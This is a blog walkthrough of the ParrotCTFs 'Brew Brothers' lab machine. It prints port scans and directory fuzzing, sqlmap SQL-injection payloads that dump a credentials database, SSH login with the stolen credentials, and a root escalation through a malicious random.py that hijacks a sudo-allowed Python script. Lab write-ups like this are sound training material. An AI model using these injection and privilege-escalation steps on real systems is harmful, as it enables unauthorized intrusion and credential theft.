0xEleven's blog

ParrotCTFs: Brew Brothers Writeup

ParrotCTFs: Brew Brothers Writeup

VJ XI's photo
VJ XI
May 24, 2023·

5 min read

Creator: smogetto

Difficulty: Medium

Category: SQL Injection

Link: https://parrot-ctfs.com/hacking/labs/

Host: 10.14.0.32

Objectives

  • Obtain user and root flags

  • Answer all questions

Description:

The Brew brothers have a vulnerable Website. Can you hack into it?

Diving in into the barrel

The box is pretty direct and easy because we already know that we are supposed to perform SQL Injection on a website but don't know where it occurs.

Before anything, check if your VPN is running and try pinging the box to ensure it's up for hacking.

A toast to Nmap

We need to run a simple yet so comprehensive nmap scan to make sure which port our web server is hosted on this machine

nmap 10.14.0.32
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 50.52 seconds

50.52 secs?

Sweet!!, we have 2 ports open 80 http , 22 ssh

As we saw earlier, we are supposed to perform SQL injection so no need to concentrate on ssh . If you find yourself brute-forcing ssh just know you're doing something wrong (or not :-) )

Anyway without wasting time, let's jump straight into enumerating the web server

Bytes and Barleys: Apache's Tap

First of all, we need to enumerate the webserver manually by visiting the website in our browser.

Honestly, that doesn't look good at all. The only thing we should be looking at here is either the Apache version, developer comments, or response headers (For starters) But this should not stop us from doing further enumeration.

We need to find that SQLi by "fire by ffuf", You see what I did there? OK moving on!

Fizzing Fuzz and Fermented

After not finding anything useful from the default Apache website. we move forward to fuzzing for hidden directories and files using ffuf or feroxbuster you can use gobuster too.

I'll use ffuf and feroxbuster because I like them and they have good color output.

ffuf -u "http://10.14.0.32/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc all -fc 404 -ic -e .bak,.db,.config,.txt,.backup,.php,.html,.htm,.tar,.zip,.js,.env,.proto -c

As you can see my syntax is longer than NFTs hype, let's try another one with feroxbuster

feroxbuster --url http://10.14.0.32/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x py,html,config,conf,txt,php,dev,backup,bak,pcap,properties,jpg,png,jpeg,pdf,db -k

LMAO, still longer.

The advantage of using feroxbuster is that it will fuzz recursively and it has a cool name: "Feric Oxide"

And the results are out:

http://10.14.0.32/index.html
http://10.14.0.32/website
http://10.14.0.32/website/index.html
http://10.14.0.32/website/search.html
http://10.14.0.32/website/search.php
http://10.14.0.32/website/contact.html
http://10.14.0.32/website/contact.php
http://10.14.0.32/website/l.txt

That's brilliant init! we have something to look into

/website/search.php

/website/contact.php

I assume we all hate PHP, let's get into injectin'

Brewing Queries

Let's visit http://10.14.0.32/website/contact.php and http://10.14.0.32/website/search.php and see if there is anywhere to input bad things.

Are we though? We shall find that out later. moving on

Bruh!!??. We didn't even search for anything but it's ok

Since we are not getting anything useful so far, we need to capture the requests using Burp to see what's brewing down there.

We are onto nothing here, Let's try saving both requests and run them through SQLmap hoping for the good.

That didn't work, I guess we should re-evaluate our choices about our hate for PHP and direct it to HTML. Remember we have other endpoints with the same names but they have .html . We should check them out:

/website/search.html

/website/contact.html

Damn!, That's a lot of input fields you got there. Moving on!

Now that's where I would like to inject my bad stuff.

A shot of SQL Injection: Brew with Caution!

We can capture a search request http://10.14.0.32/website/search.html and take it through sqlmap to see if we can get anything juicy

sqlmap -r search --risk 3 --level 5 --dbs

Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=hHIb' AND (SELECT 8709 FROM (SELECT(SLEEP(5)))mmPE) AND 'lQVH'='lQVH

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: search=hHIb' UNION ALL SELECT CONCAT(0x7176626a71,0x734243434c67584b654d786e6173774b4a76596348697a4d515073694e69456874766a774d47484d,0x7178707671),NULL-- -

Holy Hack !!!!, this should be easy

available databases [7]:
[*] creds
[*] information_schema
[*] lol
[*] mysql
[*] performance_schema
[*] products
[*] sys

Yes, creds , I will have those creds on the go

Now we run this oneliner that will dump those creds

sqlmap -r search2.req --batch -D creds --tables --dump

Database: creds
Table: credentials
[1 entry]
+----------+----------+
| password | username |
+----------+----------+
| p*****r  | charles  |
+----------+----------+

Who stores their passwords in clear text? anyway that adds a fine addition to our collection

We can use the creds on ssh and voila! we have our initial foothold.

ssh charles@10.14.0.32

The Root Beer chronicles

Congratulations on your user access, now the only thing remaining is gaining root access to this machine.

Before pwning, We need to make our environment stable using the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export term=XTERM

Sweet!, now it's hackin' time. get Your hacker gloves and leggings!!

As we can see on the user directory, We have note.txt and back_up.py

charles@brew-brothers:~$ cat note.txt 
Hello charles Dale here, make sure you finish the backup script for the admin panel. 

Cheers, 
Dale

import random
import requests
import hashlib

url = "http://10.14.0.32"

r = requests.post(url+"/zend.php")
earl = str(r.text)


def encrypt(string):
    sha = \
        hashlib.sha256(string.encode()).hexdigest()
    return sha
print("\n")
crk = encrypt(earl)
crk = crk + str(random.randint(1,100))

with open("/tmp/websitebackupass.txt","a") as web:
    web.write(crk+":"+earl)
    web.write("\n")

Now let's execute sudo -l to see what local man charles can execute with sudo rights on the machine.

User charles may run the following commands on brew-brothers:
    (ALL) NOPASSWD: /usr/bin/python3.8 /home/charles/backup.py

Do you smell it? Python Library hijacking

Let's get into it, shall WE?

nano or vim random.py then slap this bad boy:

import os
os.system("/bin/bash")

Save it and execute the backup.py as root to gain root access. EZ

sudo -u root /usr/bin/python3.8 /home/charles/backup.py

root@brew-brothers:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@brew-brothers:/home/charles#

Good luck with your next machine.